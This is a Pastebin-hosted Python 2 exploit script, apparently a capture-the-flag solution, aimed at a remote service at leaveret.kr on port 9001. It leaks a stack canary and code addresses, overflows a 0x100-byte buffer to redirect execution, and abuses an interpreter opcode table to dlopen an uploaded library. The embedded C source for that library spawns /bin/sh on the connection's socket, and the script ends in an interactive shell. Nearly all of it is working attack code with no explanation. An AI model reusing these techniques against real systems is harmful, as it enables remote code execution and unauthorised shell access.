document.write('
Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. import socket
  2. import struct
  3. import os
  4. import random
  5. import telnetlib
  6.  
  7. p = lambda x: struct.pack("<L", x & 0xffffffff)
  8. up = lambda x: struct.unpack("<L", x)[0]
  9. #HOST = \'0.0.0.0\'
  10. #PORT = 9797
  11. HOST = \'leaveret.kr\'
  12. PORT = 9001
  13.  
  14. t = telnetlib.Telnet()
  15.  
  16. s = socket.create_connection((HOST, PORT))
  17. d = \'\'
  18. while \'choice\' not in d:
  19.     c = s.recv(10240)
  20.     print c
  21.     d += c
  22.  
  23. s.send(\'A\')
  24. data = s.recv(1024)
  25. canary = data[0x100-8:][:4]
  26. stack = data[0x100:][:4]
  27. pc = data[0x104:][:4]
  28. print `canary`, `stack`
  29. print `data`
  30.  
  31. pc = up(pc)
  32. stack = up(stack)
  33.  
  34. s = socket.create_connection((HOST, PORT))
  35. d = \'\'
  36. while \'choice\' not in d:
  37.     c = s.recv(10240)
  38.     print c
  39.     d += c
  40.  
  41. mmap_base = pc - 0x10ce
  42. new_pc = mmap_base + stack - 0x1000
  43. print hex(new_pc)
  44. stage0 = "A" * (0x100 - 8)
  45. stage0 += canary
  46. stage0 += "A" * 4
  47. stage0 += "A" * 4
  48. stage0 += p(new_pc)
  49.  
  50. \'\'\'
  51. #########################################################
  52. # if you want to exclude compile procedure
  53. # please compile your own library manually
  54. # static compile is preferred
  55. #########################################################
  56. source = """
  57. int init() {
  58.     unsigned int **RegTable =*(unsigned int *)0x80ee344;
  59.     char buf[2560];
  60.     sprintf(buf, "/bin/sh <&%d >&%d", RegTable[7], RegTable[7]);
  61.     system(buf);
  62. }
  63. """
  64.  
  65. lib_file = open(\'_my_lib.c\', \'wb\')
  66. lib_file.write(source)
  67. lib_file.close()
  68.  
  69. os.system(\'gcc _my_lib.c -o _my_lib -m32 --shared -static -Wl,-init,init\')
  70. lib_compiled = open(\'_my_lib\', \'rb\')
  71. lib_data = lib_compiled.read()
  72. lib_compiled.close()
  73. \'\'\'
  74.  
  75. # /tmp/tmp/mylib is my library which was compiled with source above
  76. path = \'/tmp/\' + your_uploaded_library + \'\\x00\' # thorugh another prob\'s shell
  77. stage1 = "A" * (15 - 7) + path 
  78. # mov opTable[15], offset dlopen_doit (and skip padding)
  79. shellcode = bytearray([0, 0b00100100]) + chr(8 + len(stage1)) + p((0x80edf40 + 15 * 4) - mmap_base) + p(0x80b6e50)
  80. # padding + library path
  81. shellcode += stage1
  82. # and calls dlopen_doit
  83. shellcode += bytearray([15]) + p(new_pc + 4)[1:] + p(1) + p(-1) + p(0x41414141)
  84. stage0 += shellcode
  85. s.send(stage0.ljust(4096, "\\x00"))
  86. s.recv(1024) # recieve some data
  87. t.sock = s
  88. t.interact() # shell!
');